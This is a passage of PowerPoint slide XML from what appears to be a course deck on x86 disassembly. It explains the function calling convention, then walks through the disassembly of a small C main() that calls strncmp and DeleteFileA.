                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1. Push arguments into the stack; </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Call function; </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857160">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> [memory location]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857160">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Push</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> return address</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>3. Allocate space for local variable </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&amp; Set base pointer EBP</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>4. Perform function 🡪 EAX</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Restore stack to be free</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Leave</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> instruction (set ESP=EBP)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>6. Return to the previous (original)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Ret</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> instruction (pop Return addr. to EIP)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>7. Remove arguments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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504"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Function call example</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403640" y="2637000"/>
            <a:ext cx="2451240" cy="1462680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="c00000"/>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int test(int x, int y, int z);</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int a, b, c, result;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result = test(a, b, c);</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940000" y="2133000"/>
            <a:ext cx="1614600" cy="2285640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:schemeClr val="accent6"/>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push c</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push b</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push a</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call test</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>add esp, 12</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mov result, eax</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4500000" y="2853000"/>
            <a:ext cx="935640" cy="503640"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509"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C Main Method and Offsets</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496800" y="1865520"/>
            <a:ext cx="2869200" cy="82260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2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>program.exe -r filename.txt</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467640" y="2781000"/>
            <a:ext cx="3888000" cy="255996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int main(int argc, char* argv[])</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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>if (argc != 3) {return 0;}</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>if (strncmp(argv[1], "-r", 2) == 0){</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>DeleteFileA(argv[2]);</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return 0;</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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716000" y="1420200"/>
            <a:ext cx="4266000" cy="640044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004113CE </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>cmp</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[ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 3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004113D2 jz </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>short</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>loc_4113D8</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004113D4 xor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eax, eax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004113D6 jmp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short loc_411414</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>004113D8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>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esi, esp; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>save ESP value</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004113DA push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2 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>MaxCount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004113DC push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offset Str2 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>"-r"</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004113E1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eax, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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004113E4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ecx, [eax+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>agrv[1]</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004113E7 push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ecx ; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Str1</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004113E8 call</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 strncmp ; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>return to EAX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004113F8 test</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 eax, eax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004113FA jnz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short loc_411412</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004113FC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esi, esp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004113FE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eax, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00411401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ecx, [eax+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00411404 push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ecx ; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>lpFileName</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00411405 call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DeleteFileA</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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514"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Local &amp; global variables</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Operation +, -, ++, --, %</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Condition</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
